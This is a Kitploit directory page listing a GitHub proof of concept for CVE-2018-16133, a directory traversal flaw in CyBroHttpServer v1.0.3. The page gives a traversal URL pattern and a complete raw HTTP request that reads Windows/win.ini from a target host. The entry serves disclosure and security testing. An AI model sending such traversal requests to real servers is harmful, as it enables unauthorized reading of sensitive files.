Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CyBroHttpServer-v1.0.3-Directory-Traversal — Directory Traversal in CyBroHttpServer v1.0.3 allows an attacker to read sensitive informations. | Kitploit
Tools/GitHubGitHub/emreovunc/cybrohttpserver-v1.0.3-directory-traversal
Vulnerability AnalysisExploitationWeb Application Exploitation
GitHubemreovunc/cybrohttpserver-v1.0.3-directory-traversal

CyBroHttpServer-v1.0.3-Directory-Traversal

Directory Traversal in CyBroHttpServer v1.0.3 allows an attacker to read sensitive informations.

View Repository
2318 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CyBroHttpServer-v1.0.3-Directory-Traversal

Directory Traversal in CyBroHttpServer v1.0.3 allows an attacker to read sensitive informations.

CVE-2018-16133

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16133

PoC

To exploit vulnerability, someone could use 'http://[host]/../../../../../../../../' request to get some informations from the target. For example: http://[host]/../../../../../../../../Windows/win.ini'

root@kitploit:~
GET /../../../../Windows/win.ini HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

alt tag

alt tag

Download Tool